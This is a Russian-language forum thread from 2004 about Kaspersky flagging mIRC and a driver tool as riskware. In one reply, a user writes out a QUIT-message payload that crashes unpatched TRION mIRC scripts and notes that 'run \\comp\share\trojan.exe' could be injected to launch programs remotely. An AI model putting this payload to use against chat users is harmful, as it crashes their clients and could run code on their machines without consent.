Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
|
Ну mIRC 6.01 и впрямь без пяти минут троян 11.02.04 01:22 Число просмотров: 1624
Автор: Killer{R} <Dmitry> Статус: Elderman
Отредактировано 11.02.04 01:36 Количество правок: 1
|
У меня в альясах прописана команда которая сходу наповал убивает любого клиента со старыми 6.хх мирками. Вообще если поработать можно туда и шелл код засунуть. А если у тебя еще трин какой нибудь накручен поверх такого мирка то вообще мрак... Запуск любой программы запросто устраивается одим правильно сформированным QUIT-сообщением.
ЗЫ Virus found: win.com: MS.WIN32.Windows.98
|
|
<miscellaneous>
|
AVP ругается на mIRC и драйвер SiS AGP 08.02.04 22:57
Автор: :-) <:-)> Статус: Elderman
|
Сегодня AVP меня удивил:
C:\Program Files\mIRC\mirc.exe Инфицирован not-a-virus:RiskWare.mIRC.6.01
C:\WINDOWS\htpatch.exe Инфицирован not-a-virus:Tool.Win32.HTPatch.b
На счет mIRC - да-а-а, не знал, что Касперы до такого дошли (IE и Outlook не менее относятся к not-a-virus:RiskWare, но их он почему-то не предлагает удалить =).
А вот какого х.. он детектирует htpatch.exe - вообще не понятно. Эта штука ставится вместе с драйверами AGP для чипсетов SiS. Зачем же ее внесли в базу?
|
|
Ну mIRC 6.01 и впрямь без пяти минут троян 11.02.04 01:22
Автор: Killer{R} <Dmitry> Статус: Elderman
Отредактировано 11.02.04 01:36 Количество правок: 1
|
У меня в альясах прописана команда которая сходу наповал убивает любого клиента со старыми 6.хх мирками. Вообще если поработать можно туда и шелл код засунуть. А если у тебя еще трин какой нибудь накручен поверх такого мирка то вообще мрак... Запуск любой программы запросто устраивается одим правильно сформированным QUIT-сообщением.
ЗЫ Virus found: win.com: MS.WIN32.Windows.98
|
| |
Даа. тогда про mirc понятно 11.02.04 12:45
Автор: :-) <:-)> Статус: Elderman
|
Давненько я на IRC не ходил, и как выяснилось, к лучшему =)
> вообще мрак... Запуск любой программы запросто устраивается
> одим правильно сформированным QUIT-сообщением.
Кстати я нашел инфу только про переполнение буфера в команде DCC SEND, не мог бы ты подробнее рассказать про QUIT?
|
| | |
Это дыра не в самом мирке а в очень популярном скрипте под... 11.02.04 14:25
Автор: Killer{R} <Dmitry> Статус: Elderman
|
> Кстати я нашел инфу только про переполнение буфера в
> команде DCC SEND, не мог бы ты подробнее рассказать про
> QUIT?
Это дыра не в самом мирке а в очень популярном скрипте под него - TRION (популярен он потому что мирк там русифицирован). Вобщем дыра состоит в том что если выйти с чата так вот:
/quit } /timer 0 10 /quit �!!!!!!!!!!�4!!!!!!!!�12!!!!!!�!!!!!!!!
все все непропатченные трионы вылетят. с сообщением �!!!!!!!!!!�4!!!!!!!!�12!!!!!!�!!!!!!!! Дыра в некорректном обработке сообщений начинающихся с } - при этом все что после } исполняется как скрипт. Туда ведь можно впихнуть run \\comp\share\trojan.exe такой же фокус можно сделать при изменении топика канала. Кстати срабатывает не всегда= надо както специально длину сообщения подбирать - я делал это методом тыка а вообще надо почитать про дыру это подробнее чтоб узнать закономерность.
|
|
КАВ "закручивает" гайки? 10.02.04 21:26
Автор: JINN <Sergey> Статус: Elderman
|
> Сегодня AVP меня удивил:
> C:\Program Files\mIRC\mirc.exe Инфицирован
> not-a-virus:RiskWare.mIRC.6.01
> C:\WINDOWS\htpatch.exe Инфицирован
> not-a-virus:Tool.Win32.HTPatch.b
> На счет mIRC - да-а-а, не знал, что Касперы до такого дошли
> (IE и Outlook не менее относятся к not-a-virus:RiskWare, но
> их он почему-то не предлагает удалить =).
Сообщение с "Форум-а программы Remote Administrator"
http://www.radmin.com/ru/support/forum/read.php?FID=13&TID=6266
Тема: «Касперский версии 5 и Radmin»
"Бета касперского 5 находит r_server.exe и предлагает его убить. Он конечно пишет в имени вируса not_a_virus_radmin, но пользователи как правило в такие подробности не вникают... "
зы Остается дождаться, когда и explorer.exe всё-таки станет вирем...
|
|
Да убей ты его. Галимый он. Тормозит и ругается. Вебер имхо... 10.02.04 04:08
Автор: Hrenolog Статус: Незарегистрированный пользователь
|
|
Да убей ты его. Галимый он. Тормозит и ругается. Вебер имхо лучшее.
|
|
|
подробно о проекте
Анализ криптографических сетевых...
